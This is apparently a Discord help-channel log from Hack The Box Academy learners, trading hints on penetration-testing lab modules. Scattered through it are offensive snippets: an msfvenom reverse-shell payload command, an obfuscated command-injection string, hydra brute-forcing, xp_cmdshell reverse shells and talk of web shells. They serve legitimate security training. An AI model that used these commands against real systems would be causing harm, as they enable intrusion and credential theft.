iirc krbrelayx can take hashes or pw as input, so you didnt have to convert it manually but just use the other parameter

makes sense, thanks

praying helps you learn faster

3 days. A day is measured as 8 hours

so a 8h module is measured as 2.6 hours?

Bruh

24 hours is not enough

An 8h module is measured as 8h…

time must slow down to fit that ballpark

? That's not how math works

.

hello, im having trouble since i packets dont reach the machine's IP and 10.10.14.1 responds that the hosts are unreachable, i have tried restarting several times the machines and doesnt seem to work

So?

24 / 3 = 8

So?

so 8 /3 = 2.6

The day metric is defined as a working day

same thing

But why?

Not really

cuz he said a day is measured as 8 hours

It’s not the same thing, one is measure in days, one is measured in hours

ye

So not the same

exactly

Jfc

As in a day, for htb estimate, is 8 hours

Cant tell if you’re just trolling

Didn't think I'd need to elucidate the obvious

did the box tell you that?

shrink a day down to 8 hours
so you have 8 hours in a day
24 hours is 3 days

8 hours is not 2.3 hours

If you see a module listed as 8 hours, it’s 8 hours, if you see a module listed as 3 days, it’s 3x 8 hours

alr

It's literally convention

meaning only 1 whole day

3days in htb = 1 day irl

If you want to sit behind your screen for 24h, sure

When you say you worked a day, you don't say you worked 24 hours

You worked 8 hours of that day

will that make me pro hacker? xd

You don’t? My work weeks are 120 hours! Just like lolz

i couldnt imagine working that long..

No

lmao

ss

That’s not an ssh key

then what

That's a certificate like something used for ssl stuff

Then go back and enumerate with tom’s credentials

lolz is my alt btw

magnus carlsen can bend time

i found it and login imaps also

Admitting to having an alt: mods ban this man

why

Why do you have alts…

for personal use?

Who’s use is the other acc then?

my PC

imaps and pop3s will give you the same key ID you enumerate the email

So personal use as well

Don’t use alts

You don't need an alt for desktop and mobile g

its a way to transfer texts, files and others from my phone to my PC and via versa

cant send shit myself

So find the correct thing in IMAPs

You know you can create your own private server yeah?

you'd be surprised how many i've seen that have this setup

i dont like that

i just need chat with myself

talking to myself

You can make a server where you post that in

And that's how you get involuntarily committed to an asylum

i found 1 file on inox but i cannot find keys

Still no need for an alt

to what?

The email in the inbox has the answer

i have my own private server where i send stuff to transfer

are u mad that i have alt?

Nah, having an alt is just cringe

;x

Especially if it's for the purposes of being lazy

I'm actually stupid, ignore the message i send above wanting help, i got 2 aliases htb and htb_academy to connect to the vpns i was using the wrong one

ye

alts r the best

i've lost 1 hour of my life

there's definitely no need for an alt unless you need a separate one for work/school/whatever that isn't personal

i try to find it but no luck

If you were doing it for the sake of being a troll or fucking around that's different

u should always have alts

dont listen to these people.

they dont hack anyone

Select the right inbox and it's there

it's ok i have an alt myself

you should have one as a matter of personal cleanliness

mf i have completely different servers im in and completely different people on both accounts, i can transfer stuff from servers and private servers im in for quick use

yah i see tom and his domain how to find more details

Yes, as that’s often a means of mute/ban evasion

You need to fetch a body[]

no

Yes

i use it when my battery died

you can think of it as teleportation

My brother in christ

yah wait i send it

You can sign in on your desktop

Anybody kno hot fix the problem where xfreerdp isn't connecting in the pass the hash from windows section??

why not just use the same account on both pc and mobile

it's honestly easier that way

Single quotes, turn it off and on again

i like things harder

seems counterproductive

What single quotes

trust me its not

Are you using the right argument with xfreerdp

Yes

Iirc it's /h: or /pth:

No here password is provided

Are you sure?

I vaguely recall it gives you a hash, not a password

Ya this is the pass the ticket from windows

Yes: but you can't use the hash as the password with xfreerdp

It's a different argument for it than /p:

This is the chapter right after pass the hash one in that only hash given

result

Here we get the password to login via rdp but can't login

Yes I'm aware

That's why I phrased my hint the way I did

Password attacks, ptt

oh this is not right inbox am i rigth?

Oh yeah no, wrap the password in single quotes

It's the right inbox, otherwise it wouldn't have pulled email info

The all argument for fetch doesn't grab email contents

then what i miss?

^

okay should i follow more knowledge about it?

it helps to look up IMAP commands

If you search this channel for imap ive shared a link a while back

thanks buddy i got it... mwaahhh....

Very useful feature of discord

Marcie's already told you exactly what you need to do

but i recommend looking some commands

There's a reason I remember a lot of nuanced things

Because people ask the same damn things

is this platform watch from htb

?

A lot of these questions are answered in the official forums as well.

Most people don't know how to Google and have not seen the forums

Like straight up giving the answers :p

Yeah, they should include the links to the forums in the modules.

Eh

Would maybe make it less flodded in here with easy to answer questions

This channel's purpose is literally assistance with modules, no matter how simple/easy they are

i mean the modules literally say come to discord for help lol

i also think discord has become the norm for this kind of stuff

i haven't made a forum account in years

It's also faster to get an answer here than the forums

Yeah that's true. And I get why people ask in here. I just think they'll find better answers in the "startes" modules on the forums since there is sooo many questions and answers in there.

Though I swear @acoustic owl stalks the forums

Also so many forums where there's a non-answer or misleading answer

Or going far outside the scope of what's expected to answer

To be honest, I hang out more on Discord than on the forums

I just remember early on whenever I was searching the forums I'd see your name

maybe in some of them. but the ones I have seen it's been pretty much to the point on a lot of the questions. I guess it depends on which modules etc etc

Yeah. Its mostly why I stopped using it

But also in the forum, it's better to be a bit more direct as it's much more asynchronous communication

Is anyone able to assist with the AD challange 2?

you mean AD enum and attacks Skill Assessment 2?

Yes

Im on the sql01 box as mssqlexpress

with the creds I found previously

but dont see a way forward

Are you able to assist

Haven't finished this module

What question are you stuck on

You can likely find nudges using discord's search feature

hey there is a issue with mysql i try to find data bases but no luck

Are you closing your query with a ;

Hey again! Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I am on sql01 as mssqlexpress but I dont see anything here.

yes

Have you logged into mssql?

Yeahh I got a reverse shell from enable_xp_cmdshell. Also theres the 4 default databases I did not see an interestig one

Have you checked your privs?

Im a sysadmin

That’s not what I asked 😄

Whoami /priv

of course lol forgetting the basics

how to find mysql database details guys

follow the module

if it's not working. reset the target and try again

found it and miss some basics once i found htb user pass i will inform you.

rule 1: always read the section before asking questions

a good majority of the times you will be provided credentials to use

hey some issue with pass i found it and show error

dude i'm busy "some issue with pass and show error" isn't really descriptive

what error

i found password from users database but htb says it is not password

make sure there's no additional spaces before/after

yes already check

done

thank you for valuble time and guides...

https://academy.hackthebox.com/achievement/711030/143
lets goooo

In bloodhound I see user CT059 has genericall over DA but the hint is stating I need to use responder but I used it in the beginning.

You can use it again

Well I used inveigh

Yeah thats what I was thinking it needs to be ran from a different computer

Hello, I don't understand why I can't get the right answer.

Linux Fundamentals/File Descriptors and Redirections

First question : How many files exist on the system that have the ".log" file extension?

locate *.log | wc -l
return 29
Right answer : 32 ! (I got it from BF ...)

How many total packages are installed on the target system?
dpkg --list | wc - l
return 748
748 is a wrong answer ...

Can someone please explain my mistakes? Thx

Hi everyone, I am working on the Windows module, the first chapter, I managed to find the executable requested by the first question but I cannot understand

The required response format

I found poqexec.exe as executable

there's several windows modules

true

Intro to Windows CLI; Windows Priv-Esc

Windows vent fining evil

off the top of my head

ah right the blue team one

Yes

n0 81u3 f0r m3 😉

It asks me for the answer in the format: T_W_____.exe I don't understand what that means

ubuntu@WEB01:~$ chmod +x backupjob
ubuntu@WEB01:~$ ./backupjob
Segmentation fault (core dumped)

Pivoting, Tunneling and Portforwarding section, module "Meterpreter Tunneling & Port Forwarding"

Followed the module completely. Tried Pwnbox and own machine. I see others have had issues with this, but cant see any solutions

That initial bit is part of the answer

It's likely you used the wrong payload

Ran the command exactly as its written in the module msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost -f elf -o backupjob LPORT=8080

I take it you substituted the ip for yours yeah?

For the former, I believe I used find instead of locate. My reasoning was that I didn't have sudo permission to run updatedb. I wonder if that will give you a different answer.

For the latter, I used apt list --installed, but I think the more pertinent thing would be that, if I recall, some lines sent to STDOUT are informational and not package names. I would check on that.

The <IPadressofattackhost> is meant to be substituted

Dpkg --list has a bunch of extra lines. And locate doesn't really show all sometimes. Find is a much better command to locate files usually

With dpkg --list you'll need to additionally grep for 'ii' (which is dpkg speak for "fully installed"

I mean, I obviously replaced it

I can never be too sure my dude

Thx
apt list --installed | wc -l doesn't work either
That returns 738 and it's wrong anwser too 😦

It's written like this: T_W_____.exe

Yeah, but wc is just counting the lines returned. Some of the lines returned by apt list --installed are not package names. You either need to grep for what you're looking for or visually see how many lines lead the actual data and subtract that number.

Btw if you're trying to show format use backticks, discord is formatting it

Do apt list --installed | head 5 and you'll see why it's wrong

Like imagine apt list --installed returns
Okay boss here are some packages that you have installed. Here they are... package1 package2 [...]

Also it helps to run this on the target machine

That's how you get the expected answer

Also apt gives you a warning that its output is not clean WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

2 things, I didn't invite you to dm and I haven't done this module

Thanks

Please is there anyone who has worked on the windows vent fining evil module?

Thanks for the nudges. PWNED

Congrats

Silly me !
apt list --installed | grep / | wc -l works fine !
Thx !

Thx @oblique tusk too

If you're not getting the expected answer: always walk back the command so you can see why its not working the way you want

Yes !

most tools as well will give you descriptive errors or at least some sort of thing to tell you why it failed

i.e. 'command not found' < self explanatory - you don't have the tool installed/the tool isn't in your PATH

okay worked with a stageless payload for some reason

MarcieLee, did you work your way through the whole pentesting learning path? How long do you think it took you if you did?

in the kerberos module rbcd from linux, using rbcd.py i get an error saying "msDS-AllowedToActOnBehalfOfOtherIdentity is empty", this means carole can't abuse this, right? are there other creds i'm supposed to use?

stuck on this because the command doesn't work

i was able to complete it by using an older version of rbcd.py

What is the difference between a "ffuf -w "wordlist" -u http://FUZZ.website.com/" scan and a "ffuf -w "wordlist" -u http://website.com/ -H 'HOST: 'http://FUZZ.website.com' scan?

Obviously with all caps on the FUZZ since it decided not to let me post it with all caps.

maybe u want only two websites on same host

so u specify

Hey there. I am stuck on the last two questions of this module.https://academy.hackthebox.com/module/112/section/1073 I have tried nmap and ssl into the imap. Not sure how to find the email

sorry, i mean not sure how to find the admin email address.

vhost fuzzing and subdomain fuzzing, but your syntax for vhost fuzzing is wrong, it should be -H "Host: FUZZ"

You're right about my syntax. I was just trying to figure out the difference between the two.

Also trying to determine if I should be using ffuf or wfuzz.

yeah so vhost fuzzing vs subdomain fuzzing

If you read the email, you can find the admin email

ffuf is faster and still being udpated

Maybe I don't fully understand vhost vs subdomain

the way I logged in was as the robin user that was in the documentation. It said there were 0 emails

Perhaps not in the inbox you start with

But there's other mailboxes

oh.... ok. Let me mess around. Thanks

Enumeration is key

you are very very good at this

I am on the last question wordpress skill assesment but when I place the web shelli I get the following error --> Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

can someone ping me directly to provide clarification for this question please?

What question

can any of my senior help me out because am losing my question i feel it write but the input into the task is wrok

wut

i mean't this "Can any of my seniors please assist me? I'm going crazy over this question; I think it's correct, but the exam is showing it incorrectly because of the input text "

question " What is the name of the network interface that MTU is set to 1500?"

send a link to the module

whatt link ?

are you taking an exam or doing modules?

this is the #modules channel

every module has a url.

modules

https://academy.hackthebox.com/module/18/section/70

yeah that thanks

what happens when u run the ip a command

Need some extra eyes if someone is able, am I missing someting here? This is for the Command Injection Skills assessment. I have found the parameter to exploit, but no matter what I obfuscate, or encode I get the Malicious request detected ||/index.php?to=tmp%2F696212415.txt&from=696212415.txt%26%26b$@ash<<<$(b$@a$@s$@e64 -d<<<bHMgLWFsaA==)
&finish=1&move=1 ||.

tfw the kerberos ticket didn't wanna load for me to read the share >:(

I'll just say that when you execute this command (ifconfig),

ifconfig is deprecated by ip because of systemd

of course bling-bang-bang-born comes on as I get it working

(ip a) let me run this command

the song is a banger

wat song

i can't access my Pwnbox and i have subscription for Platiinum, which included unlimited Pwnbox usage.

why does the paths completed say 10 in the transcript but the website show 11 ?

hey guys want some tips for make notes for modules and ready for the exam. any cpts completed one?

can you help me with flag 9?

what module

https://academy.hackthebox.com/module/9/section/44

Would someone mind having a look at my question above? I'd greatly appreciate it

post the url to the module

https://academy.hackthebox.com/module/109/section/1042

oh. i see. no documentation above it.

Need some extra eyes if someone is able, am I missing someting here? This is for the Command Injection Skills assessment. I have found the parameter to exploit, but no matter what I obfuscate, or encode I get the Malicious request detected ||/index.php?to=tmp%2F696212415.txt&from=696212415.txt%26%26b$@ash<<<$(b$@a$@s$@e64 -d<<<bHMgLWFsaA==)
&finish=1&move=1 ||.

I don't remember what I did exactly but think dumber, also test for which characters are blacklisted so you know what to avoid

Yea, I am not quite sure how to tell , i'm not seeing the errors on the response to be able to test that

if you see malicious request detected then you're probably using a bad character

ya, that's indeed what' im seeing

is anyone else having issues spawning their vm? my box won't spawn for kerberos module "Account Enumeration & Password Spraying with Kerberos"

any reason that my target isnt spwaning on this network enumeration with nmap hard lab

And done..!!
Thank you @fathom pendant @next bronze @placid edge @limber river

looks like i'm not the only one then.. server must be down

lmao crazy timing

Completed..!
Thank you everyone for the support to solve some crazy questions

That's a lot 💛

congrats

congrats bruh...

htb loging issues any one face it?

been fine on my end

how i log this so teribble. how i report this?

using the support bubble

in the meantime try changing vpn regions ¯_(ツ)_/¯

if you're logged in*

if you're having trouble logging in; try clearing your browser cache

and disabling adblock

this link i access lastly

for support him

this link

no previous one

https://academy.hackthebox.com/module/109/section/1042

i am not complete this module

I resolved the issue and completed the module. ** Note to self, don't always assume your injecting in the correct parameter even if you get the Error, try other parameters and get things qiuckly lol!

Alright I'm really stuck on the File Inclusion skills assessment, I don't want to say too much to not spoil most of the assessment. But I'm trying to ||poison the log|| and I am having zero success and I can't figure out why this isn't working.

Edit: Nevermind restarting the target solved the issue

What do you guys use for transferring files from host to Pwnbox with RDP session inside it? I don’t think http server work so

you can use smb server

its the same module as r3dph30n1x#7788 can someone help me none of the smb or ftp methods are working to transfer the file

what module?

file transfer module in the windows file transfer methods

They have no communication in between so

everytime i try to transfer the files from my host to the target by using the target's powershell it says nothing is found

I’m in a different module not the file transfer module

so what do i do use base 64?

oh

yes you can

so the rest of the methods dont work?

they all work iirc

pretty sure I tried it all ^

i tried to ping my host from the target's powershell and there is no connection why

what error are you facing with smb / http?

did you authenticate to the smb server?

no ill try but the ftp transfer isnt working either

if you're using xfreerdp, you can use /drive:/path/to/whereever and it will mount your folder

create an smb server with a username and password.

I think this method gets covered later in the module.

you have to Ensure that the upload_win.zip file is actually present in the share directory on your pwnbox machine

what if the command is this sudo impacket-smbserver share -smb2support /tmp/smbshare
is the file in the smbshare directory?

would you look at that it does

create the dir here then /tmp/smbshare

ok i dont have the dir b4

and copy the zip file there.

i did this but it still isnt working

do i have to replace n

its here

remove the n :

do we use copy

can you ping the windows box?

nvm we need to connect rfirst

yup but my windows box cant ping my linux VM

Nvm.
bruh your share name is wrong

smbshare not share

in my windows session or linux

the sharename is share isnt it

you should be able to view the contents now

dir \\10.0.2.15\smbshare\

windows

yes but he created smbshare on the linux box

the sharename is specified as share

1st argument

its not working

the 1st image

yea i think the name of the share is "share"

really?

How did you name it on your kali machine ?

the first argument without - dictates the share name

😭 my windows session crashed on me

im good now

I get that but if his command was

sudo impacket-smbserver share -smb2support /tmp/smbshare
``` wouldnt smbshare be the name?

share is the shareName, and /tmp/smbshare is the sharePath

positonal arguments in argparse

oh I see.
Thanks for pointing that out

you got it?

no its stil not working

first make sure the windows target can ping your ip

why can my linux VM ping my windows but not the other way

it doesnt work

run ipconfig in windows, send the output

df

looks like firewall

yea i tried with my actual OS and it was the same thing

^

yea im trying i think i disconnceted the xfreerdp session by accdient

nvm lab expired

use the vpn interface

tun0

ok

i forgot

it works now

yeah that should do it

And using the share too?

I have always been renaming my share name so I got it confused lol

If you didn’t reset your vm, you were using the wrong ip all along

10.0.2.15 instead of 10.10.14.86

i forgot to use tun let me see if it works now

ah yeah I always just use $(pwd) or . so that the share opens in the current dir

OMG IT WORKS YES THnks

👍🏼

ty so much guys/girls helps a lot

👍

Always make sure you use the right ip

yeah, I have seen something like that from Ippsec ^

How do I go about this guys?

You can use SMB shares to transfer files. Easiest thing you could do is enable the drive setting in xfreerdp which makes it very easy to transfer files

This can be done even if host and the rdp sessioned host doesn’t have any communication?

nope

if there's no communication then you won't get rdp either

is it something related to pivoting?

So, the file is in my main host and I’m running pwnbox thru which I’m RDPing to another host. I want to get the files from main host >> RDP’ed host

Nah this is intro modules so no pivoting yet

use the techniques from the file transfers module

it wouldn't be that hard, aditionally, look into the manual of xfreerdp or whatever tool you use for the RDP

This module I haven’t reached yet I’m in prerequisite module

then there should be a connection if its not pivoting and intro module@crimson moon

main host like your own pc? pwnbox has internet access so whatever you have in your own pc, pwnbox can be used to download it

Yes own pc. So you mean pc>>pwnbox>>RDP host?

Just get whatever you want on pwnbox

If you’re working from your own pc you might as well leave pwnbox out and just use your own vm and use the vpn🤷🏼‍♂️

I will give it a big try

ive been pinged

lol, congrats on completing the path!

Hey guys is it just me or have the SSH and RDP machine become incredibly slow and unstable?

Hey do HTB offers path completion certificate kind of thing ????
If so how can I have it?

RDP half of the time only launches on a black screen for me. When it works after multiple tries its unbelievably slow.
SSH is more stable but slow as well.

You get a badge when completing the path

Black screen is a screensaver… press enter

That I got but certificate kind of thing?????

Not as far as I know

wel

that fixed it

Black screen got another one

pass cpts and you get a cert

Many have perished before you

but hey you get one from cpts lol

That makes me feel a little better....

😄

Any secret tips for the slowness of ssh and rdp?

and a cool little sword ^

I haven’t really had issues with it personally

pick a server closest to you

The issue might be your own connection

46 ms

I am on a 100 ~ 200 and I don't face this issue

nvm that was pwn box, not sure can I test it from my own VM?

ping the target ip

14 ms

It could also just be me being spoiled and always having instant feedback.

Already happy that the backscreen will not be a problem anymore

I mean there will always be some latency with rdp, but I haven't really run into it being unuseable

My biggest annoyance is when I hit backspace and it takes 3-5 secs for it to actually do that.

try swtiching vpn servers i guess, but if it shows <100ms I don't see how it's doing that

Thanks will try, Thank you everybody for tha help ❤️

Need to grid for that 😅

Hello everyone,

I would like to ask for you help in module "Web Requests" in CRUD API section..

I tried to follow the instructions to obtain the flag but when I try to update the name of any city to update with the name "flag" the update command doesn't seem to work although the code seems to be accepted by the terminal ..

Do you have any suggestions about this?

The command that I'm using is the following (for example) :

curl -X PATCH http://83.136.252.214:51966/api.php/city/london -d '{"city_name" :"flag"}' -H 'Content-Type: application/json'

After the above update when I try to display the result it seems that the update didnt happen at all..

Thanks in advance! Have a great week!

Module : ADVANCED XSS AND CSRF EXPLOITATION
Section : Bypassing CSRF Tokens via CORS Misconfigurations
I am working on the question at the end of the section. I used the payload shown in the section with a minor change of the element id from csrf to csrf_token.
But i dont see any token for admin in the /log
Also tried few times of restart the lab
Need some assistance please

should use put instead of patch no?

or maybe im mixing them

I've tried this as well and still have the same issue..

Fyi, I choose to use patch at first because the task says to update only the city_name

seems weird that url you have

api.php/city/london

sure its not api.php?city=london

or whatnot

I was following the module's examples that's why I used that syntax.

I will try your suggestion and I will inform. 🙏

footprinting - hard
hi can anybody help me im stuck at the initial stage of the lab
i cant find the snmp running on the target

link ?

https://academy.hackthebox.com/module/112/section/1080

did you look for every port ?

nope it took too long for me like it was none stop or using your own vm faster?

is it linux or windows ?

what are you refering to

the "victim"

windows i assume didnt really take note

you should, enum everything

what can i even do with the os?

understand what you do

how to enum right

if you do not know what you are dealing with , you can´t hack it

was told there id snmp running on the target but the normal ports 161,162 showed its close so i cant communicate with it

tcp or udp ?

for the snmp?

yes

udp

and you are sure snmp is the answer ?

no other service ?

I can't even complete modules this morning because the SSH and RDP connections keep crashing

there was ssh and imap pop3

hmmmmmmm imap or pop3

maybe this would help

u need credentials dont u?

or maybe restart server ... sometimes it hangs

i did this module some tiome ago tbh

i switch between like 3 vpn alr

the "victim"

not the vpn

yea did that as well

Oh that one. I remember this one. Where are you stuck?

I will say that snmp is definitely the answer on that one

Hey guys.
I have a question about an SSRF question in the Web Service & API Attacks module:
The question is the following:

The payload consists of a base64 encoded url, when trying to access 127.0.0.1:3002 the connection is open and nothing happens.

As he asks to identify, I believe I am missing something.
I thought about serving an index file on my machine and making the request for it but I don't really know how to set up the index since I don't have access to the technology running on the server...

anyone to help?

On the Module Password Attacks there is a section called password mutation and im stuck on the assesment here is the question "Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer." Basically the things i have done are:

Create a mutated list with this command "hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list"
Brute force ssh using this command " hydra -l sam -P mut_password.list ssh://10.129.151.233"
I also Tried Brute forcing FTP. Still no luck can anyone give a guide here?

That section teaches you patience xd

Check the word count of the mutated worldlist; it should be around 94k words.

Remove first 20000 or 30000
Things will be little easier

Hi guys, I'm currently on "Windows Attack and Defense | Kerberoasting" but I can't ssh or rdp to the kali vm. I've tried following the instructions on the previous page but it gives me a certificate verification failure (self signed certificate). Any advice?

does it ask you to connect anyway

No

oh that's right

you don't connect to the kali vm on that section

you connect to ws001

No?

see at the bottom of the page it asks you to rdp using bob's credentials

It says to use hashcat, is that on the ws001

Yes

you probably can ssh into kali from ws001 but i didn't do that

i just cracked the hash on my own vm

Sounds like a plan

Thank you !

Guys quick question, i just elevated my privs to local admin group. running "net localgroup administrator" i see my account there. but somehow when i try to access admin folder doesnt work... logged out and back in of RDP still nothing, ran gpupdate /force also and same thing.. What step am i missing?

Not sure what module you are on.

Last one

Lateral Movement Attacking Enterprise Networks

Everytime i try to access teh admin folder to get the flag over the desktop i get an access denied

what host are you on?

MS01

I think the problem i have is that everytime i try to open an elevated pshell it tries to log in as a domain joined user, which i'm not..

Haha got it

hey

i tried your suggestion but nothing seems to change, it accepts the syntax but still it doesn't apply the update for some reason... But when i try to insert a new data (instead of update) using POST , the command works just fine... Thank you for your suggestion though. :))

keep the url as you had

use PUT instead of PATCH

should you be passing in a country_name also?

This time it accepted the PUT input, and the update was succesful! Thank you!! I updated only the city name because the task says "First, try to update any city's name to be 'flag'.[...]"

cool

Is it correct that I can use my APP vip OpenVPN for Academy also? It's seems to work fine?

what do u do when u run out of modules?

wait

for what

new modules

soon (tm)

been thru enough of that ^

i mean as a computer hobby

i was about to ask when's the first insane module but that's not a difficulty..

what do u do when there are no more modules

i would probably do some boxes

i think the challenges part of the website is so slept on tbh

can get really creative if u want to

a lot of the challenge categories i have no experience in

in terms of exercises it's good to practice approaching and modeling problems in a manna thatz complimentary to unique problem sets

if they are easy u can get the experience with some experimentation and a few F5

you have a point

i am about to run out of modules

i just have a hard time figuring out where to start

might study basketweaving next. seen some cool stuff people can make.

if i ever run out of content.. might just go back to doom modding

you guys should get into bin exp, that's what all the cool kids do these days

yeah really?

i'm on pwn college why are u absent

pwn college is p good

do you do any pwnables?

i just completed the assembly module so it's a plausible path to take

yh i was active on pwnable.kr

but i'm taking the soc path so i gotta do malware analysis

i'm null from crackmes

this is my other handle

is the heap content on pwn.college good?

idk i just like the way it is structured and welcoming.

y u in this discord but not that 1?

idk you can invite me and ill join lol

tell me more about VR

got the tip! and finally solved the task. Thanks again!! 🙏

np

what trainings are good for VR and pwn ?

I play ctfs with my work colleagues sometimes

do u kno thegrugq

At work it's mostly web exploitation but I have recently been assigned to do some kernel research

is he the twitter guy? maybe?

i drive him to drink and relapse

i think he was/is big in that space tho

ive seen his tweets

he doesnt seem active anymore

anyway this is tha modules channel

are there any pwn modules u know about?

i did the binex ones and am finishing game reversing

but outside of that i'm not sure?

well what do you know about pwn? I usually separate it by rop/kernel/heap

how good are you at each section

it seems like all the kool kids are doing kernel on iot

quick fireos bounties

yes kernel stuff is cool but you need rop knowledge first

oh? is that like alphabet soup but for memory?

idk what you mean

Return-Oriented Programming

alphabet soup is a random assortment of small pasta formed in the shape of alphabet characters and consumers make a game of rearranging it into comprehensible words

oh thats like stack-based

so the usual beginner pwn stuff is rop

oh i see

do you think chaining rop gadgets together is like playing alphabet soup

i would suggest focusing on rop until you understand it well. look at all stack protections and understand how canary, nx, pie, relro all work. practice buffer overflow with ret2shellcode, ret2win and then do ret2libc. Learn about leaking addresses via f-strings and how to overwrite memory such as GOT.

After this focus on statically compiled binaries where there is no libc, use the syscall gadget to pop a shell. then look at srop techniques for when there are lack of gadgets to populate a execve syscall

Hey guys im losing my mind in the last module of enterprise. need to sync my kali with DC01 via proxychains, tried plenty of tools but everytime i get server not eligible with ntpdate...

um where is the module for it

idk i dont do hackthebox 🤣

why are u here

i played a htb ctf

am i not allowed to be here ? i was being helpful ...

no i was wondering if u dont do that why would u visit

for cyber apocalypse

its pretty fun

I got the port but it seems not to work, when I use it. can you please give a hint? I'm not sure if i got the right IP

i did this if u get stuck. there's a debugging section that trips people up with the sandbox checking

i haven't tried it. i think they have cool hoodies tho? or a shirt? something like that

i'll keep that in mind

Try tool ligolo

It is internal

im stuck on password attacks module under pass the hash from linux section in the last question before the optional exercises where should i be looking for linux01 kerberos ticket exactly i have used all the ones in the tmp file and got nothing

find the keytab files

i think i got it

Im working on the Advanced XSS and CSRF CORS misconfiguration module. Can someone DM me? Im not sure I understand what the challenge is expecting

any help for MODERN WEB EXPLOITATION TECHNIQUES Skills Assessment?
admin password and ssrf

Take a closer look at the ||HTML elements||

can I DM you? I have what I think is going to exfil what I want. I just cant get it to do what I need it to do

wait nvm.

sure

nvm, I managed to get it to work. user error

Hey lads, I do have a problem regarding https://academy.hackthebox.com/module/77/ on section Public Exploits, I just obtained the flag however the HTB academy platform does not seem to accept the flag, any thoughts?

maybe try manually typing instead of pasting

Hello, can somebody tell me what the glibc version is in the module Linux Privilege Escalation Shared Object Hijacking ? I have know tried so many versions because the one on the machine is/are not working. Edit: Solved it (Had a Space somewhere)! This module is just trash.

found it. that was easy. the problem was for the box. one special request did not generate and send from the app

No luck on that unfortunately 😦

Tried to reset the machine and perform it again, the flag is still the same however HTB does not accept it

carefully read the question, emphasize on the path of the file

so im doing the footprinting module, on ODAT.

i installed ODAT but gettgin this

i even chmod +x the py files

Hi guys 🙂 As I'm doing the cwee path I'm keeping on adding scripts for tedious attacks here: https://github.com/nirzaaa/cweeScripts
Would be happy to share with you if might help, you can dm me for feedback if would like too of course

Really cool and appreciated it

Thank you very much for the kind words, very important to me to give back to the community. Tried to add comments and explanations too to make it easier for people who following too the cwee path with scripts that will help them along the way❤️

||I did that, my understanding is that we should locate the flag on the system through cmd and cat the flag, I received it, not sure if something else should be done besides that ||

if youd like you can DM me what youre trying to submit and I can verify if its correct

Since Ive loooooong since completed that module

just @ me if you do I dont get new message notifications

is anyone on ACTIVE DIRECTORY ENUMERATION & ATTACKS not able to rdp? given just a black screen?

Sure, thank you so much in advance!

Press enter.

Can anyone help me out with the Secure Coding 101: Skills Assessment for the Patch section? Im just at a loss at what I am supposed to sanitize. I have tried to sanitize a bunch of different stuff but nothing's worked yet

Hacking Wordpress

Directory Indexing

I have tried many things to reach the directory that includes the flag including trying the plugins that are available. If anyone can help I would appreciate it

Look in the directory as explained in the module.

i used c# and took advantage of harmony in bepinex to write a prefix patch that sets drm to 0 but i'm curious how you did this with dnspy

try xfreerdp /v:ip:port /u:user /p:pass /dynamic-resolution

hey guys, I'm such a noob and am stuck in Using Web Proxies module, can someone help me? I'm trying to find the damn flag using burp intruder, the question goes like "Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.", I've set the payload option to .html, the grep - match to 200 OK and the position is "GET /§admin§/ HTTP/1.1..." but whenever I start attack, it gives me a 403 status for the .html file. What am I doing wrong?

Thank you both @autumn pilot and @thorn urchin. Managed to solve the lab I made a very stupid mistake

spoiler: make sure yall attacking YOUR lab 😛

Nothing seems to work

your setting there would be replacing the admin in the url, not actually testing for files under the directory

Good afternoon. I'm stuck and need some help on SQLMap Esstentials - Attack Tuning : What's the contents of table flag5? (Case #5)

I've dumped a flag from the flag5 table but it's not accepted. I've checked it for whitespaces and I've tried everything from this lesson to see if another flag is found but all I can find is the same incorrect flag.

Here's what I ran: ||sqlmap -u http://$target/case5.php?id=1 --no-cast --dump --level=5 -T flag5 -C id,content --risk=3 --batch||

Here's the last piece of the flag I keep getting: ||w0r7h_17||

I tried to be more explicit in my command is the reason I added the -C switch with id and content. It really didn't do anything. I've tried other syntax variations with the -a switch but it didn't change my result either. I'm lost in the sauce lol

I was having lots of issues with that question, eventually just restarting the target and running my exact same command again worked and I got the flag

https://academy.hackthebox.com/module/145/section/1298
i really dont get this module
im stuck cant get rce i found another port with ffuf :5000 other then that im in a dead end

I'm having this issue with Antak Webshell in the Shells & Payloads module.
I followed the "guide" in the module and I'm supposed to get a Powershell window and I get met by the error page. I've tried to reset the ip etc. but with no luck. Can anyone nudge me in the right direction? Thanks!

If someone encouter this error. There is an easy fix for it. In Remmina configure the TLS Security Level on 0 -- Windows 7 compatible

I've dumped three different flags - none of them have been correct lol

can i get a nudge for the foothold medium lab. im enumerating and feel like im in the right dir but not sure

Where are you stuck at?

Module:NTLM Relay Attacks
Question Skills Assessment:Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
Hi can anyone give a hint im stuck here

||ive mounted the NFS but am not finding anything in the text files as of yet. the only other options would be to BF rdp and SMB||

you don't need to check every file

You're on the right track. You'll find the hint where you're at now.

most of them are infact empty

you still alive🤯

there.is.so.many.files

well if only there was a way to find a file that's not empty

:)

If only you could see the forest for the trees

hehehehe

why do i make things harder than they are

i wayyyy otherthought what i need to do in medium

am i supposed to get this error

Did you figure it out? That part was painful

not yet ||i found both a local and remote db but the sa pw doesnt work and crackstation wont crack it||

So you don't use it there

||my only guess is smtp, but the smtp server wont ping||

Right click and run as administrator

i quit

Don't quit

like im off my game today

||You don't enter sa and the password into the program itself. You right click the program and run it as administrator. It'll ask you for the password you found from important.txt.||

yeah thats why i said i quit

it was way overthought

Oh right. It took me like 45 mins of fumbling around and getting angry before I got it

yeah its one of those ** its not this easy it cant be this easy what the frick its actually this easy**

I found medium harder than the hard lab personally

But mostly because of the frustrations at that last part

Hello @rustic sage I am stuck at the same point..I did try to AXFR all subdomains but no help. Could you provide any pointers?

Where are you stuck at?

you still need to specify the nameserver with dig

but also bruteforcing is the solution

there's a handy tool provided by the section

the answer will be a subdomain of a subdomain

made that WAY harder than need bbe

yeah you need to find a tool that helps with the enum

